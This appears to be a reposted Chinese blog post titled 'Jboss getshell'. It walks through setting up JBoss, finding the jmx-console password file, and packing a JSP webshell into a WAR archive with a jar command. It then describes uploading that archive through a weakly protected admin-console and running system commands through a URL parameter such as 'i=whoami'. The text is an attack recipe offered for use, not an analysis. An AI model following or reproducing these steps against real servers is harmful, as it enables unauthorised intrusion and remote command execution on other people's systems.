• Jboss getshell

     Jboss 的安装需要 JDK 环境

    JDK+JBOSS 包 

    初始环境配置

    系统变量名        变量值

    PATH                  %JAVA_HOME%in;%JAVA_HOME%jrein

    JAVA_HOME      C:Program Files (x86)Javajdk1.6.0_43

    CLASSPATH       .;%JAVA_HOME%/lib/dt.jar;%JAVA_HOME%/lib/tools.jar 

    JBOSS_HOME     C:WWW

    JBOSS 密码

    linux 下

    /usr/java/jboss/server/default/conf/props


    jmx-console-users.properties 密码

    windows 

    serverstandardconfprops 

    jmx-console-users.properties  

    制作war包 shell

    上传war包 会自动解压war包内的文件。

    比如上传 xx.war  直接访问 xx/webshell.jsp 

    jar cvf filename.war  webshell.jsp

    0x01利用弱密码 进行getshell

    admin-console 

    需要存在该页面

    URL:http://127.0.0.1:8080/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR%29&conversationId=43&conversationPropagation=end

     

    点击 continue 上传

    直接访问根目录   http://x.x.x.x/warname/shellname.jsp

     http://127.0.0.1:8080/echod2018/echod.jsp?pwd=023&i=whoami

     --------------------------------------------------------------------------------------------
  • 相关阅读:
    JavaScript ECMAScript版本介绍
    Webpack
    路由
    组件(重难点)
    npm包管理工具
    过滤器
    Vue实例生命周期
    数据双向绑定的原理
    MVC + MVVM
    vue事件修饰符
  • 原文地址:https://www.cnblogs.com/echod/p/9006863.html
Copyright © 2020-2023  润新知